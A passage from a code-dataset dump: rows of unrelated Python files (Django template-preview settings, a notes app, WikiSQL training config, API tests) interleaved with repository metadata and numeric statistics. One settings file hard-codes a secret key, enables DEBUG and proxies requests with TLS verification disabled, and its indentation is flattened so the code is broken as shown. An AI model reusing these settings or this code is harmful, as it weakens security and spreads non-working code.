okChangeIndent = skipNext or ((ls != []) and (ls[0] in indentChangers))
skipNext = (len(l) > 2) and (l[-2] in skipNextChars)
outf.write(l)
outf.close()
| 25.666667
| 90
| 0.490909
| 254
| 2,310
| 4.46063
| 0.23622
| 0.071492
| 0.067079
| 0.021183
| 0.144748
| 0.135922
| 0.11474
| 0.082966
| 0.082966
| 0.082966
| 0
| 0.013479
| 0.325541
| 2,310
| 89
| 91
| 25.955056
| 0.713736
| 0
| 0
| 0.342466
| 0
| 0
| 0.094805
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.041096
| 0
| 0.041096
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e997ebbde4fce0c730819b363c5adbce38d2664d
| 8,729
|
py
|
Python
|
actionkit_templates/settings.py
|
MoveOnOrg/actionkit-templates
|
2d06ad7634fac59e352d5cd8625f3092624d30e4
|
[
"Unlicense",
"MIT"
] | 8
|
2016-11-29T07:34:04.000Z
|
2021-06-09T18:09:25.000Z
|
actionkit_templates/settings.py
|
MoveOnOrg/actionkit-templates
|
2d06ad7634fac59e352d5cd8625f3092624d30e4
|
[
"Unlicense",
"MIT"
] | 12
|
2016-12-06T17:24:58.000Z
|
2022-02-21T20:11:47.000Z
|
actionkit_templates/settings.py
|
MoveOnOrg/actionkit-templates
|
2d06ad7634fac59e352d5cd8625f3092624d30e4
|
[
"Unlicense",
"MIT"
] | 4
|
2016-12-25T11:16:34.000Z
|
2020-02-11T18:48:26.000Z
|
import json
import os
import sys
import time
try:
from urlparse import urlparse
except ImportError:
# python3
from urllib.parse import urlparse
from django.conf.urls import url
from django.conf.urls.static import static
from django.http import HttpResponse, Http404
from django.shortcuts import render_to_response, redirect
from django.template.loader import render_to_string
from django.template.base import add_to_builtins
from django.views.static import serve
from .moveon_fakeapi import mo_event_data
"""
try running with
aktemplates runserver 0.0.0.0:1234
"""
DEBUG = True
SECRET_KEY = 'who cares!'
INSTALLED_APPS = ['actionkit_templates', ]
try:
import template_debug #django-template-debug
INSTALLED_APPS.append('template_debug')
import django_extensions #django-extensions
INSTALLED_APPS.append('django_extensions')
except:
pass
#one directory down
APP_PATH = os.path.dirname(__file__)
PROJECT_ROOT_PATH = os.path.abspath(os.getcwd())
#############
# STATIC DIRECTORY
#############
#note this only works if DEBUG=True
STATIC_ROOT = os.environ.get('STATIC_ROOT', os.path.join(PROJECT_ROOT_PATH, './static'))
STATIC_URL = os.environ.get('STATIC_URL', '/static/')
STATIC_FALLBACK = os.environ.get('STATIC_FALLBACK', False)
STATIC_LOCAL = os.environ.get('STATIC_URL', None) # an explicit local or not
#############
# TEMPLATES
#############
DEFAULT_TEMPLATES = os.path.join(APP_PATH, 'templates')
DIR_TEMPLATES = []
if os.environ.get('TEMPLATE_DIR'):
DIR_TEMPLATES.append(os.environ.get('TEMPLATE_DIR'))
else:
for d in ('./', './template_set', './_layouts', './_includes'):
dd = os.path.join(PROJECT_ROOT_PATH, d)
if os.path.exists(dd):
DIR_TEMPLATES.append(dd)
DIR_TEMPLATES.append(DEFAULT_TEMPLATES)
TEMPLATES = [
{ 'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': DIR_TEMPLATES,
},
]
MIDDLEWARE_CLASSES = []
add_to_builtins('actionkit_templates.templatetags.actionkit_tags')
def _get_context_data(request, name=None, page=None, use_referer=False):
# Build the template rendering context for a preview request.
# name/page select an entry from the packaged contexts dict; when
# use_referer is True, they are derived from the Referer header (or a
# ?path= parameter) instead.  A project-local contexts.json (or the file
# named by CUSTOM_CONTEXTS) is merged in under the 'Custom' key.
# NOTE(review): leading indentation was lost in this copy; the statements
# below are this function's body -- re-indent before running.
from actionkit_templates.contexts.page_contexts import contexts
# Default dev-server port, overridden by the request's Host header.
port = '4000'
hostport = request.get_host().split(':')
if len(hostport) > 1:
port = hostport[1]
if use_referer:
paths = None
if request.META.get('HTTP_REFERER'):
paths = urlparse(request.META['HTTP_REFERER']).path.split('/')
elif request.GET.get('path'):
# e.g. &path=/events/event_search.html
paths = request.GET['path'].split('/')
# paths[0] is the empty string before the leading '/'.
if paths and len(paths) > 1:
name = paths[1]
if len(paths) > 2:
page = paths[2]
custom_contexts_file = os.path.join(PROJECT_ROOT_PATH,
os.environ.get('CUSTOM_CONTEXTS', 'contexts.json'))
if os.path.exists(custom_contexts_file):
try:
contexts.update({'Custom': json.loads(open(custom_contexts_file).read())})
except ValueError as e:
raise Exception("JSON Parsing Error for context file %s %s" % (
custom_contexts_file, e.message))
#first use ?template= if there, otherwise name's template, otherwise homepage
cxt = dict(
devenv={
'enabled': True,
'port': port,
'STATIC_URL': STATIC_URL,
'STATIC_LOCAL': STATIC_LOCAL,
'MO_EVENTS_API': '/fake/api/events'
}
)
context_data = contexts.get(name, {})
if page:
context_data = contexts.get(name, {}).get(page, {})
cxt.update(context_data)
# No matching context: render the index page listing all known sections.
if not context_data:
sections = []
for section, pages in sorted(contexts.items()):
sections.append([section, sorted(pages.items())])
cxt.update({
'page': {'title':'Homepage'},
'pagelinks': sections})
if request.GET.get('user_id'):
#for debugging tests based on user.id % 2, e.g.
context_data.setdefault('user', {}).update({'id': int(request.GET.get('user_id'))})
# Query-string parameters override/extend the context's 'args'.
args = cxt.get('args', {}).copy()
args.update(request.GET.dict())
cxt['args'] = args
if 'akid' not in cxt:
cxt['akid'] = cxt['args'].get('akid')
cxt['request'] = request
cxt['js_context'] = '""' # FUTURE: what should go in here?
return cxt
#############
# HOME PAGE TEST
#############
def index(request, name, page=None):
    """Render the preview page for *name*/*page*.

    The template is taken from ?template=, falling back to the context's
    'filename' entry, then to the homepage template.
    """
    context = _get_context_data(request, name, page)
    fallback_template = context.get('filename', "homepagetest.html")
    template = request.GET.get('template', fallback_template)
    return render_to_response(template, context)
def login_context(request):
# JSONP-style endpoint that feeds the fake ActionKit login context to the
# page's actionkit.forms.onContextLoaded callback.
# NOTE(review): leading indentation was lost in this copy; the statements
# below are this function's body -- re-indent before running.
cxt = _get_context_data(request, use_referer=True)
from actionkit_templates.contexts.event_context_json import event_json
# Copy so deleting 'name' below never mutates the shared module dict.
event_json_copy = event_json.copy()
coming_from = request.GET.get('url','')
if 'event' in coming_from \
or 'logged_in' in coming_from \
or 'survey_logged_in' in coming_from:
# Without ?login=..., simulate an anonymous visitor by dropping 'name'
# (except on survey_logged_in pages, which always get the full record).
if not request.GET.get('login') and 'survey_logged_in' not in coming_from:
del event_json_copy['name']
return HttpResponse(
'actionkit.forms.onContextLoaded(%s)' % json.dumps(event_json_copy))
elif cxt.get('context'):
return HttpResponse('actionkit.forms.onContextLoaded(%s)' % json.dumps(cxt['context']))
else:
return HttpResponse(
#text key has all the generic error messages
'actionkit.forms.onContextLoaded({"text": %s})' % json.dumps(event_json['text']))
def user_password_forgot(request):
    """Stub for ActionKit's password-reset URL; no real behavior here."""
    return HttpResponse('unimplemented')
def logout(request):
    """Redirect to ?next=... when supplied, else to the static logout page."""
    next_url = request.GET.get('next')
    if next_url:
        return redirect(next_url)
    return redirect('/logout.html')
def event_search_results(request, page):
# JSONP endpoint returning rendered event-search-result HTML to the page's
# actionkit.forms.onEventSearchResults callback.
# NOTE(review): leading indentation was lost in this copy; the statements
# below are this function's body -- re-indent before running.
cxt = _get_context_data(request, 'events', 'WILL_USE_REFERER_HEADER', use_referer=True)
# special query results context:
all = cxt['args'].get('all') == '1'
cxt.update({'all': all})
if cxt.get('SLOW_SEARCH'):
# This allows us to test for race conditions
time.sleep(2)
search_results = render_to_string('event_search_results.html', cxt)
return HttpResponse('actionkit.forms.onEventSearchResults({})'
.format(json.dumps(search_results)))
def event_api_moveon_fake(request):
"""Fake representation of MoveOn events api"""
# Returns the current context's events as JSON, shaped by mo_event_data.
# SLOW_API / 500_API context flags let tests simulate latency and failure.
# NOTE(review): leading indentation was lost in this copy; the statements
# below are this function's body -- re-indent before running.
cxt = _get_context_data(request, 'events', 'WILL_USE_REFERER_HEADER', use_referer=True)
events = cxt.get('events', [])
if cxt.get('SLOW_API'):
# This allows us to test for race conditions
time.sleep(2)
if cxt.get('500_API'):
raise Exception('Cause failure to allow graceful degradation')
search_results = [mo_event_data(evt) for evt in events]
return HttpResponse(json.dumps({'events': search_results}), content_type='application/json')
def proxy_serve(request, path, document_root=None, show_indexes=False):
# Serve a static file locally; on 404, transparently proxy the same path
# from roboticdogs.actionkit.com (when `requests` is importable).
# NOTE(review): leading indentation was lost in this copy; the statements
# below are this function's body -- re-indent before running.
try_proxy = True
try:
import requests
except ImportError:
try_proxy = False
try:
return serve(request, path, document_root, show_indexes)
except Http404:
if try_proxy:
prefix = request.path.split('/')[1]
# SECURITY NOTE(review): verify=False disables TLS certificate
# verification for the upstream fetch -- acceptable only for this
# local dev proxy; do not reuse in production code.
content = requests.get('https://roboticdogs.actionkit.com/{}/{}'.format(prefix, path), verify=False)
if content.status_code == 200:
return HttpResponse(content.content, content_type=content.headers['Content-Type'])
raise Http404
#############
# URLS
#############
# This settings module doubles as the URLconf for the preview server.
ROOT_URLCONF = 'actionkit_templates.settings'
urlpatterns = [
url(r'^context', login_context),
url(r'^progress', login_context, name='progress'),
url(r'^logout', logout, name="logout"),
# Catch-all: /<section>/<page> renders a packaged context via index().
url(r'^(?P<name>[-.\w]+)?(/(?P<page>[-.\w]+))?$', index),
url(r'^forgot/$', user_password_forgot, name='user_password_forgot'),
url(r'^cms/event/(?P<page>[-.\w]+)/search_results/', event_search_results, name='event_search_results'),
url(r'^fake/api/events', event_api_moveon_fake, name="event_api_moveon_fake"),
# ActionKit urls or {% url %} template tag:
url(r'^fake/stub/reverse', event_api_moveon_fake, name="reverse_donation"),
]
# Static files are served locally, with /resources/ and /media/ falling back
# to the remote ActionKit host through proxy_serve().
if STATIC_ROOT:
urlpatterns = (urlpatterns
+ static(STATIC_URL, document_root=STATIC_ROOT)
+ static('/resources/',
view=proxy_serve,
document_root=os.path.join(STATIC_ROOT, './resources'))
+ static('/media/',
view=proxy_serve,
document_root=os.path.join(STATIC_ROOT, './media'))
)
# Allow a project-local local_settings.py to override anything above.
if os.path.exists(os.path.join(PROJECT_ROOT_PATH, 'local_settings.py')):
from local_settings import *
| 35.77459
| 112
| 0.643487
| 1,085
| 8,729
| 4.988018
| 0.235945
| 0.013304
| 0.019217
| 0.019401
| 0.186438
| 0.108278
| 0.078344
| 0.078344
| 0.05728
| 0.05728
| 0
| 0.005681
| 0.213541
| 8,729
| 243
| 113
| 35.921811
| 0.782666
| 0.069195
| 0
| 0.090909
| 0
| 0
| 0.179642
| 0.056563
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042781
| false
| 0.016043
| 0.117647
| 0.005348
| 0.224599
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a05f45a351e31a1eadb205f7bd181f6ae63473
| 2,314
|
py
|
Python
|
Mock-exams/02-Mock-exam/notes/notes/app/views.py
|
M0673N/Python-Web-Basics
|
cecc27f7a12f990756edcc8885290eb3b2e487b7
|
[
"MIT"
] | null | null | null |
Mock-exams/02-Mock-exam/notes/notes/app/views.py
|
M0673N/Python-Web-Basics
|
cecc27f7a12f990756edcc8885290eb3b2e487b7
|
[
"MIT"
] | null | null | null |
Mock-exams/02-Mock-exam/notes/notes/app/views.py
|
M0673N/Python-Web-Basics
|
cecc27f7a12f990756edcc8885290eb3b2e487b7
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, redirect
from notes.app.forms import ProfileForm, NoteForm, NoteDeleteForm
from notes.app.models import Profile, Note
def home(request):
    """Landing page: ask for a profile when none exists, else list notes.

    POST creates the profile; an invalid form is re-rendered with errors.
    """
    if request.method == 'GET':
        profile = Profile.objects.first()
        if not profile:
            form = ProfileForm()
            return render(request, 'home-no-profile.html', {'form': form})
        notes = Note.objects.all()
        return render(request, 'home-with-profile.html', {'notes': notes})
    form = ProfileForm(request.POST)
    if form.is_valid():
        form.save()
        return redirect('home')
    return render(request, 'home-no-profile.html', {'form': form})
def add_note(request):
    """Create a note: GET shows an empty form, POST validates and saves."""
    if request.method != 'GET':
        form = NoteForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('home')
        # Fall through: re-render the bound form with validation errors.
        return render(request, 'note-create.html', {'form': form})
    form = NoteForm()
    return render(request, 'note-create.html', {'form': form})
def edit_note(request, pk):
    """Edit the note identified by *pk*: GET pre-fills, POST saves."""
    note = Note.objects.get(pk=pk)
    if request.method != 'GET':
        form = NoteForm(request.POST, instance=note)
        if form.is_valid():
            form.save()
            return redirect('home')
        # Re-render the bound form with validation errors.
        return render(request, 'note-edit.html', {'form': form})
    form = NoteForm(instance=note)
    return render(request, 'note-edit.html', {'form': form})
def delete_note(request, pk):
    """Confirm (GET) and perform (POST) deletion of note *pk*."""
    note = Note.objects.get(pk=pk)
    if request.method != 'GET':
        note.delete()
        return redirect('home')
    form = NoteDeleteForm(instance=note)
    return render(request, 'note-delete.html', {'form': form})
def note_details(request, pk):
    """Show the detail page for note *pk*."""
    selected_note = Note.objects.get(pk=pk)
    return render(request, 'note-details.html', {'note': selected_note})
def profile_details(request):
    """Show the single profile together with the total number of notes."""
    profile = Profile.objects.first()
    note_queryset = Note.objects.all()
    context = {'profile': profile, 'notes': note_queryset.count()}
    return render(request, 'profile.html', context)
def delete_profile(request):
    """Delete the profile and all notes, then return to the home page."""
    current_profile = Profile.objects.first()
    all_notes = Note.objects.all()
    # Delete the profile first, then the notes (original order preserved).
    current_profile.delete()
    all_notes.delete()
    return redirect('home')
| 29.291139
| 88
| 0.600259
| 270
| 2,314
| 5.111111
| 0.159259
| 0.086957
| 0.137681
| 0.1
| 0.626812
| 0.603623
| 0.542029
| 0.500725
| 0.364493
| 0.23913
| 0
| 0
| 0.256698
| 2,314
| 78
| 89
| 29.666667
| 0.802326
| 0
| 0
| 0.603175
| 0
| 0
| 0.107174
| 0.009507
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.047619
| 0
| 0.396825
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a09dff959ae1110da793fb71caa1d3736f73bf
| 3,066
|
py
|
Python
|
trainwiki.py
|
tomsonsgs/TRAN-MMA-master
|
91bf927c64a8d813ba60ae12e61e8f44830a82cc
|
[
"Apache-2.0"
] | null | null | null |
trainwiki.py
|
tomsonsgs/TRAN-MMA-master
|
91bf927c64a8d813ba60ae12e61e8f44830a82cc
|
[
"Apache-2.0"
] | null | null | null |
trainwiki.py
|
tomsonsgs/TRAN-MMA-master
|
91bf927c64a8d813ba60ae12e61e8f44830a82cc
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 2 00:56:18 2019
@author: tang
"""
# Shared WikiSQL experiment hyperparameters, consumed by update()/updatetest()
# below (mirrors the shell-variable block commented out at the end of file).
seed=102
vocab="vocab.bin"
train_file="train.bin"
dropout=0.3
hidden_size=256
embed_size=100
action_embed_size=100
field_embed_size=32
type_embed_size=32
lr_decay=0.5
beam_size=5
patience=2
lstm='lstm'
# Attention variant over table columns.
col_att='affine'
# Checkpoint base name under saved_models/wikisql_bk/.
model_name='wiki'
def updatetest(opt):
    """Configure *opt* in place for decoding/evaluation on WikiSQL test."""
    decode_name = 'wikitest.decode1'
    opt.cuda = True
    opt.mode = 'test'
    # Load the trained checkpoint named by the module-level model_name.
    opt.load_model = 'saved_models/wikisql_bk/' + model_name + '.bin'
    opt.beam_size = 5
    opt.parser = 'wikisql_parser'
    opt.evaluator = 'wikisql_evaluator'
    opt.sql_db_file = 'data/wikisql1/test.db'
    opt.test_file = 'data/wikisql1/test.bin'
    opt.save_decode_to = 'decodes/wikisql/' + decode_name
    opt.decode_max_time_step = 50
def update(opt):
    """Fill *opt* with the training-time settings for the WikiSQL model.

    Mirrors the (commented-out) exp.py command line below, but points at
    the data/wikisql1 copies and the wikisql_bk save directory.
    """
    settings = {
        'cuda': True,
        'seed': seed,
        'mode': 'train',
        'batch_size': 16,
        'parser': 'wikisql_parser',
        'asdl_file': 'asdl/lang/sql/sql_asdl.txt',
        'transition_system': 'sql',
        'evaluator': 'wikisql_evaluator',
        'train_file': 'data/wikisql1/' + train_file,
        'dev_file': 'data/wikisql1/test.bin',
        'sql_db_file': 'data/wikisql1/test.db',
        'vocab': 'data/wikisql1/' + vocab,
        'glove_embed_path': 'data/contrib/glove.6B.100d.txt',
        'lstm': lstm,
        'column_att': col_att,
        'no_parent_state': True,
        'no_parent_field_embed': True,
        'no_parent_field_type_embed': True,
        'no_parent_production_embed': True,
        'hidden_size': hidden_size,
        'embed_size': embed_size,
        'action_embed_size': action_embed_size,
        'field_embed_size': field_embed_size,
        'type_embed_size': type_embed_size,
        'dropout': dropout,
        'patience': patience,
        'max_num_trial': 5,
        'lr_decay': lr_decay,
        'glorot_init': True,
        'beam_size': beam_size,
        'eval_top_pred_only': True,
        'decode_max_time_step': 50,
        'log_every': 500,
        'save_to': 'saved_models/wikisql_bk/' + model_name,
    }
    for option, value in settings.items():
        setattr(opt, option, value)
#python -u exp.py \
# --cuda \
# --seed ${seed} \
# --mode train \
# --batch_size 64 \
# --parser wikisql_parser \
# --asdl_file asdl/lang/sql/sql_asdl.txt \
# --transition_system sql \
# --evaluator wikisql_evaluator \
# --train_file data/wikisql/${train_file} \
# --dev_file data/wikisql/dev.bin \
# --sql_db_file data/wikisql/dev.db \
# --vocab data/wikisql/${vocab} \
# --glove_embed_path data/contrib/glove.6B.100d.txt \
# --lstm ${lstm} \
# --column_att ${col_att} \
# --no_parent_state \
# --no_parent_field_embed \
# --no_parent_field_type_embed \
# --no_parent_production_embed \
# --hidden_size ${hidden_size} \
# --embed_size ${embed_size} \
# --action_embed_size ${action_embed_size} \
# --field_embed_size ${field_embed_size} \
# --type_embed_size ${type_embed_size} \
# --dropout ${dropout} \
# --patience ${patience} \
# --max_num_trial 5 \
# --lr_decay ${lr_decay} \
# --glorot_init \
# --beam_size ${beam_size} \
# --eval_top_pred_only \
# --decode_max_time_step 50 \
# --log_every 10 \
# --save_to saved_models/wikisql/${model_name}
| 28.924528
| 63
| 0.689498
| 458
| 3,066
| 4.286026
| 0.237991
| 0.091696
| 0.038207
| 0.040754
| 0.395313
| 0.26541
| 0.102904
| 0.102904
| 0.073357
| 0
| 0
| 0.027144
| 0.170907
| 3,066
| 105
| 64
| 29.2
| 0.745083
| 0.377038
| 0
| 0.16129
| 0
| 0
| 0.192926
| 0.101822
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0
| 0
| 0.032258
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a18b845016664a0d3350f6afe5c55f943340ff
| 3,476
|
py
|
Python
|
heritago/heritages/tests/tests_annotationdatamodel.py
|
SWE574-Groupago/heritago
|
ec7d279df667a4f2c3560dfac4b5b17046163a95
|
[
"MIT"
] | 6
|
2017-02-13T10:22:18.000Z
|
2017-03-11T20:38:30.000Z
|
heritago/heritages/tests/tests_annotationdatamodel.py
|
SWE574-Groupago/heritago
|
ec7d279df667a4f2c3560dfac4b5b17046163a95
|
[
"MIT"
] | 172
|
2017-02-12T21:07:27.000Z
|
2017-06-08T10:46:58.000Z
|
heritago/heritages/tests/tests_annotationdatamodel.py
|
SWE574-RenameMe/heritago
|
ec7d279df667a4f2c3560dfac4b5b17046163a95
|
[
"MIT"
] | 17
|
2017-02-13T08:29:37.000Z
|
2017-06-29T14:43:53.000Z
|
import unittest
from django.test import Client
class AnnotationDataModelTests(unittest.TestCase):
    """Integration tests for the W3C Web Annotation data model at
    /api/v1/heritages/<id>/annotations.

    setUpClass creates one heritage item and one annotation through the
    live API (django test Client); each test then inspects the GET
    response for that annotation.
    """

    # "#" is replaced with the created heritage's id in setUpClass.
    api_url_template = "/api/v1/heritages/#/annotations"
    xpath_annotation_response = ""
    heritage_path = ""
    api_url_set = ""

    @classmethod
    def setUpClass(cls):
        # Create the fixture heritage + annotation once for the whole class.
        cls.heritage_path = "/api/v1/heritages/"
        h_id = cls.create_heritage_item()
        cls.api_url_set = cls.api_url_template.replace("#", str(h_id))
        cls.ann_response = cls.create_XPATH_annotation()
        # The annotation "id" is an IRI; its second-to-last path segment is
        # the numeric pk -- TODO confirm against the serializer.
        cls.ann_id = cls.ann_response["id"].rsplit("/", 2)[-2]
        cls.ann_get_response = Client().get(cls.api_url_set + "/" + str(cls.ann_id)).json()

    @classmethod
    def create_heritage_item(cls):
        """POST a sample heritage item and return its id."""
        client = Client()
        r = client.post(cls.heritage_path, {
            "title": "Santa Clause",
            "description": "Santa Claus, also known as Saint Nicholas, Saint Nick, Kris Kringle, Father Christmas, "
                           "or simply Santa (Santy in Hiberno-English), is a legendary figure of Western Christian "
                           "culture who is said to bring gifts to the homes of well-behaved (\"good\" or \"nice\") "
                           "children on Christmas Eve (24 December) and the early morning hours of Christmas Day "
                           "(25 December).",
            "startDate": "1087",
            "endDate": "continuing",
            "exactDate": "1700",
            "origin": [{"name": "Dutch"}, {"name": "British"}],
            "basicInformation": [{"name": "AKA", "value": "Sinterklaas"}],
            "tags": [{"name": "religion"}, {"name": "christmas"}, {"name": "figure"}]
        })
        return r.json()['id']

    @classmethod
    def create_XPATH_annotation(cls):
        """POST a minimal anno.jsonld annotation with a FragmentSelector target
        and return the parsed JSON response."""
        return Client().post(cls.api_url_set, {
            "@context": "http://www.w3.org/ns/anno.jsonld",
            "type": "Annotation",
            "creator": "me",
            "body": [
                {
                    "type": "video",
                    "format": "text/plain",
                    "value": "loved it"
                }
            ],
            "target": [
                {
                    "type": "text",
                    "format": "text/plain",
                    "selector": [
                        {
                            "type": "FragmentSelector",
                            "conformsTo": "http://tools.ietf.org/rfc/rfc5147",
                            "value": "char=2,4"
                        }
                    ]
                }
            ]
        }).json()

    def test_create_XPATH_annotation(self):
        # A freshly created annotation comes back as a non-empty mapping.
        ann_id = self.create_XPATH_annotation()
        self.assertTrue(len(ann_id) > 0)

    def test_annotation_must_have_1_or_more_context_property(self):
        self.assertTrue("@context" in self.ann_get_response.keys())

    def test_an_annotation_must_have_exactly_1_IRI_that_defines_it(self):
        self.assertTrue("id" in self.ann_get_response.keys())

    def test_an_annotation_must_have_1_or_more_types_and_the_annotation_class_must_be_one_of_them(self):
        # NOTE(review): assertTrue with two args does not compare them --
        # the second argument is treated as the failure message, so this
        # only checks truthiness of response["type"]; assertEqual was
        # probably intended.
        self.assertTrue(self.ann_get_response["type"], "Annotation")

    def test_an_annotation_must_have_body_relationships_associated_with_it(self):
        self.assertTrue("body" in self.ann_get_response.keys())

    def test_there_must_be_1_or_more_target_relationships_associated_with_an_annotation(self):
        self.assertTrue("target" in self.ann_get_response.keys())
| 39.954023
| 116
| 0.561277
| 378
| 3,476
| 4.880952
| 0.415344
| 0.019512
| 0.045528
| 0.04878
| 0.117073
| 0.117073
| 0.072087
| 0.072087
| 0.055285
| 0.055285
| 0
| 0.011696
| 0.311277
| 3,476
| 86
| 117
| 40.418605
| 0.758981
| 0
| 0
| 0.068493
| 0
| 0
| 0.238918
| 0.008923
| 0
| 0
| 0
| 0
| 0.082192
| 1
| 0.123288
| false
| 0
| 0.027397
| 0.013699
| 0.246575
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a26fd47a49716298a92bfa1c231de0e135e9dd
| 824
|
py
|
Python
|
tests/test_main.py
|
cesarbruschetta/julio-cesar-decrypter
|
1f8b94b6370fb0a8bbfc1fa6b44adc9d69bf088c
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_main.py
|
cesarbruschetta/julio-cesar-decrypter
|
1f8b94b6370fb0a8bbfc1fa6b44adc9d69bf088c
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_main.py
|
cesarbruschetta/julio-cesar-decrypter
|
1f8b94b6370fb0a8bbfc1fa6b44adc9d69bf088c
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
from unittest.mock import patch
from jc_decrypter.main import process, main
class TestMainProcess(unittest.TestCase):
    """Tests for jc_decrypter.main.process argument handling."""

    @patch("jc_decrypter.main.decrypter")
    def test_arg_decrypter(self, mk_decrypter):
        # The --token value must be forwarded verbatim to decrypter().
        process(["--token", "1234567890"])
        mk_decrypter.assert_called_once_with("1234567890")

    def test_not_arg(self):
        # Missing --token should abort with SystemExit.
        # NOTE(review): with plain argparse, str(SystemExit) is "2", not the
        # usage message -- this comparison only holds if process() re-raises
        # SystemExit with the message text; confirm against jc_decrypter.main.
        with self.assertRaises(SystemExit) as cm:
            process([])
        self.assertEqual(
            "the following arguments are required: --token/-t", str(cm.exception)
        )
class TestMainMain(unittest.TestCase):
    """Tests for the jc_decrypter.main.main entry point."""

    @patch("jc_decrypter.main.process")
    def test_main_process(self, mk_process):
        # main() is expected to sys.exit(process(argv)); with process mocked
        # to return 0 it still raises SystemExit.
        mk_process.return_value = 0
        self.assertRaises(SystemExit, main)
        # NOTE(review): argv seen here is pytest/unittest's own argv tail
        # (["test"]) -- this asserts main() passes sys.argv[1:] through.
        mk_process.assert_called_once_with(["test"])
| 27.466667
| 85
| 0.679612
| 96
| 824
| 5.614583
| 0.427083
| 0.061224
| 0.083488
| 0.085343
| 0.133581
| 0.133581
| 0
| 0
| 0
| 0
| 0
| 0.032458
| 0.214806
| 824
| 29
| 86
| 28.413793
| 0.800618
| 0
| 0
| 0
| 0
| 0
| 0.158981
| 0.063107
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.15
| false
| 0
| 0.15
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a3a2aba365270bf90b9a6d7673d3d58bca51fe
| 3,290
|
py
|
Python
|
template_maker/data/documents.py
|
codeforamerica/template-maker
|
66d4744c123d5b868cf259e947dc924bb5a25c9a
|
[
"BSD-3-Clause"
] | 9
|
2015-02-23T22:03:30.000Z
|
2020-01-31T19:06:50.000Z
|
template_maker/data/documents.py
|
codeforamerica/template-maker
|
66d4744c123d5b868cf259e947dc924bb5a25c9a
|
[
"BSD-3-Clause"
] | 37
|
2015-03-01T01:10:22.000Z
|
2015-12-31T17:24:42.000Z
|
template_maker/data/documents.py
|
codeforamerica/template-maker
|
66d4744c123d5b868cf259e947dc924bb5a25c9a
|
[
"BSD-3-Clause"
] | 2
|
2016-01-21T09:59:17.000Z
|
2021-04-16T10:51:04.000Z
|
import datetime
from template_maker.database import db
from template_maker.generator.models import DocumentBase, DocumentPlaceholder
from template_maker.builder.models import TemplateBase, TemplatePlaceholders
from template_maker.data.placeholders import get_template_placeholders
def get_all_documents():
    '''
    Fetch every DocumentBase row (all documents currently being edited).
    '''
    all_docs = DocumentBase.query.all()
    return all_docs
def get_documents_and_parent_templates():
    '''
    Return (document id, document name, parent template title) tuples by
    joining each document to its template.
    '''
    query = db.session.query(DocumentBase.id, DocumentBase.name, TemplateBase.title)
    query = query.filter(DocumentBase.template_id == TemplateBase.id)
    return query.all()
def get_document_placeholders(document_id):
    '''
    Return every placeholder row attached to the given document, joined to
    its template placeholder for name/type/display metadata.
    '''
    columns = (
        DocumentPlaceholder.id, TemplatePlaceholders.full_name, TemplatePlaceholders.type,
        TemplatePlaceholders.display_name, DocumentPlaceholder.value,
    )
    query = db.session.query(*columns)
    query = query.filter(DocumentPlaceholder.document_id == document_id)
    query = query.filter(DocumentPlaceholder.placeholder_id == TemplatePlaceholders.id)
    return query.all()
def get_single_document(document_id):
    '''
    Look up one document by primary key (None when it does not exist).
    '''
    document = DocumentBase.query.get(document_id)
    return document
def get_single_document_and_parent_template(document_id):
    '''
    Return one (document id, document name, template title) tuple for the
    given document joined to its parent template, or None if absent.
    '''
    query = db.session.query(DocumentBase.id, DocumentBase.name, TemplateBase.title)
    query = query.filter(DocumentBase.template_id == TemplateBase.id)
    query = query.filter(DocumentBase.id == document_id)
    return query.first()
def set_document_placeholders(template_id, document_base):
    '''
    Ensure document_base has a DocumentPlaceholder for each placeholder on
    its template, creating any that are missing; commits once at the end.
    '''
    for tpl_placeholder in get_template_placeholders(template_id):
        existing = DocumentPlaceholder.query.filter(
